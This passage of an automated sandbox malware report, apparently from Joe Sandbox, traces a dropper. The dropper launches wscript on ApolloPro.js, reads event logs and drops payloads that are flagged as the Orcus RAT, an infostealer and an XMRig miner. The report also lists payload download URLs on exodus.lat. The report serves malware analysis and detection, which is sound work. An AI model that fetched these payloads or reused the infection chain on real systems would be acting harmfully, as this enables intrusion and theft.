                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0069CD14 FindFirstFileW,FindClose,18_2_0069CD14
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0069CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,18_2_0069CD9F
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0069F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_0069F5D8
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0069F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_0069F735
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0069FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_0069FA36
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00693CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00693CE2
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\491505\Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\491505Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                                  Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                                  Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                                  Source: Joe Sandbox ViewASN Name: M247GB M247GB
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_006A29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,18_2_006A29BA
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                                  Source: RegAsm.exe, 00000016.00000002.4635504009.00000000056B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                                  Source: DM6vAAgoCw.exe, 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp, DM6vAAgoCw.exe, 00000000.00000000.2111219967.0000000000409000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                                  Source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                  Source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, Dr.com, 0000000A.00000000.2139917691.0000000000DC9000.00000002.00000001.01000000.00000007.sdmp, ApolloPro.scr, 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                                  Source: RegAsm.exe, 00000016.00000002.4571175471.000000000300E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://exodus.lat/COMSurrogat
                                  Source: RegAsm.exe, 00000016.00000002.4571175471.0000000003217000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://exodus.lat/COMSurrogate.exe
                                  Source: RegAsm.exe, 00000016.00000002.4571175471.0000000003217000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://exodus.lat/ss.bat
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                                  Source: Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/06
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_006A4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,18_2_006A4830
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_006A4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,18_2_006A4632
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeWindow created: window name: CLIPBRDWNDCLASS
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeWindow created: window name: CLIPBRDWNDCLASS
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeWindow created: window name: CLIPBRDWNDCLASS
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_006BD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,18_2_006BD164

                                  Spam, unwanted Advertisements and Ransom Demands

                                  barindex
                                  Reads the Security eventlog
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShellJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShellJump to behavior
                                  Reads the System eventlog
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                                  Operating System Destruction

                                  barindex
                                  Protects its processes via BreakOnTermination flag
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: 01 00 00 00 Jump to behavior

                                  System Summary

                                  barindex
                                  Malicious sample detected (through community Yara rule)
                                  Source: 22.2.RegAsm.exe.7c0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_Orcus Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                  Source: 22.2.RegAsm.exe.7c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                                  Source: 53.2.COMSurrogate.exe.1f79a831a78.2.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                                  Source: 53.2.COMSurrogate.exe.1f79a831a78.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                                  Source: 53.2.COMSurrogate.exe.1f79a831a78.2.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                                  Source: 53.2.COMSurrogate.exe.1f79ae4f4b0.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                                  Source: 53.2.COMSurrogate.exe.1f79ae4f4b0.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                                  Source: 53.2.COMSurrogate.exe.1f79ae4f4b0.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                                  Source: 00000035.00000002.4579522041.000001F79AD72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                                  Source: 00000035.00000002.4579522041.000001F79B391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                                  Source: 00000016.00000002.4561895270.00000000007C2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: RAT_Orcus Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                  Source: Process Memory Space: RegAsm.exe PID: 6884, type: MEMORYSTRMatched rule: RAT_Orcus Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                  Source: C:\Users\user\AppData\Local\asm\mi.exe, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                                  Source: C:\Users\user\AppData\Local\asm\mi.exe, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                                  Source: C:\Users\user\AppData\Local\asm\mi.exe, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
                                  Yara detected Orcus RAT
                                  Source: Yara matchFile source: 22.2.RegAsm.exe.7c0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000016.00000002.4561895270.00000000007C2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6884, type: MEMORYSTR
                                  Powershell drops PE file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\asm\COMSurrogate.exeJump to dropped file
                                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                  Wscript called in batch mode (surpress errors)
                                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js"
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comProcess Stats: CPU usage > 49%
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00694254: CreateFileW,DeviceIoControl,CloseHandle,18_2_00694254
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00688F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,18_2_00688F2E
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00695778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,18_2_00695778
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeFile created: C:\Users\user\AppData\Local\asm\WinRing0x64.sys
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeFile created: C:\Windows\MovieArchivesJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeFile created: C:\Windows\PackageExpressionJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeCode function: 0_2_0040737E0_2_0040737E
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeCode function: 0_2_00406EFE0_2_00406EFE
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeCode function: 0_2_004079A20_2_004079A2
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeCode function: 0_2_004049A80_2_004049A8
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0063B02018_2_0063B020
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_006394E018_2_006394E0
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00639C8018_2_00639C80
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_006523F518_2_006523F5
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_006B840018_2_006B8400
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0066650218_2_00666502
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0066265E18_2_0066265E
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0063E6F018_2_0063E6F0
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0065282A18_2_0065282A
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_006689BF18_2_006689BF
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00666A7418_2_00666A74
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_006B0A3A18_2_006B0A3A
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00640BE018_2_00640BE0
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0065CD5118_2_0065CD51
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0068EDB218_2_0068EDB2
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00698E4418_2_00698E44
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_006B0EB718_2_006B0EB7
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00666FE618_2_00666FE6
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_006533B718_2_006533B7
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0064D45D18_2_0064D45D
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0065F40918_2_0065F409
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0063166318_2_00631663
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0064F62818_2_0064F628
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0063F6A018_2_0063F6A0
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_006516B418_2_006516B4
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_006578C318_2_006578C3
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0065DBA518_2_0065DBA5
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00651BA818_2_00651BA8
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00669CE518_2_00669CE5
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0064DD2818_2_0064DD28
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00651FC018_2_00651FC0
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0065BFD618_2_0065BFD6
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeCode function: 22_2_00E6A03222_2_00E6A032
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeCode function: 22_2_00E68ED022_2_00E68ED0
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeCode function: 22_2_06DBD35022_2_06DBD350
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeCode function: 22_2_06DBB30822_2_06DBB308
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeCode function: 22_2_06DB916022_2_06DB9160
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeCode function: 22_2_06DBCF1022_2_06DBCF10
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeCode function: 22_2_06DB863822_2_06DB8638
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeCode function: 22_2_06DBD78822_2_06DBD788
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeCode function: 22_2_06FEB65822_2_06FEB658
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeCode function: 22_2_06FEBF2822_2_06FEBF28
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeCode function: 22_2_06FE388022_2_06FE3880
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeCode function: 22_2_06FEB31022_2_06FEB310
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeCode function: 47_2_00007FFD34890F3547_2_00007FFD34890F35
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeCode function: 53_2_00007FFD348B0F3553_2_00007FFD348B0F35
                                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
                                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\491505\Dr.com 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: String function: 00641A36 appears 34 times
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: String function: 00658B30 appears 42 times
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: String function: 00650D17 appears 70 times
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeCode function: String function: 004062CF appears 57 times
                                  Source: DM6vAAgoCw.exeStatic PE information: invalid certificate
                                  Source: COMSurrogate.exe.38.drStatic PE information: No import functions for PE file found
                                  Source: smartscreen.exe.22.drStatic PE information: No import functions for PE file found
                                  Source: DM6vAAgoCw.exe, 00000000.00000002.2119003912.0000000000731000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs DM6vAAgoCw.exe
                                  Source: DM6vAAgoCw.exe, 00000000.00000003.2118656988.0000000000731000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs DM6vAAgoCw.exe
                                  Source: DM6vAAgoCw.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: 22.2.RegAsm.exe.7c0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_Orcus date = 2017/01, filetype = memory, author = J from THL <j@techhelplist.com> with thx to MalwareHunterTeam, version = RAT, reference = https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/
                                  Source: 22.2.RegAsm.exe.7c0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                                  Source: 53.2.COMSurrogate.exe.1f79a831a78.2.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                                  Source: 53.2.COMSurrogate.exe.1f79a831a78.2.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                                  Source: 53.2.COMSurrogate.exe.1f79a831a78.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                                  Source: 53.2.COMSurrogate.exe.1f79ae4f4b0.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                                  Source: 53.2.COMSurrogate.exe.1f79ae4f4b0.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                                  Source: 53.2.COMSurrogate.exe.1f79ae4f4b0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                                  Source: 00000035.00000002.4579522041.000001F79AD72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                                  Source: 00000035.00000002.4579522041.000001F79B391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                                  Source: 00000016.00000002.4561895270.00000000007C2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: RAT_Orcus date = 2017/01, filetype = memory, author = J from THL <j@techhelplist.com> with thx to MalwareHunterTeam, version = RAT, reference = https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/
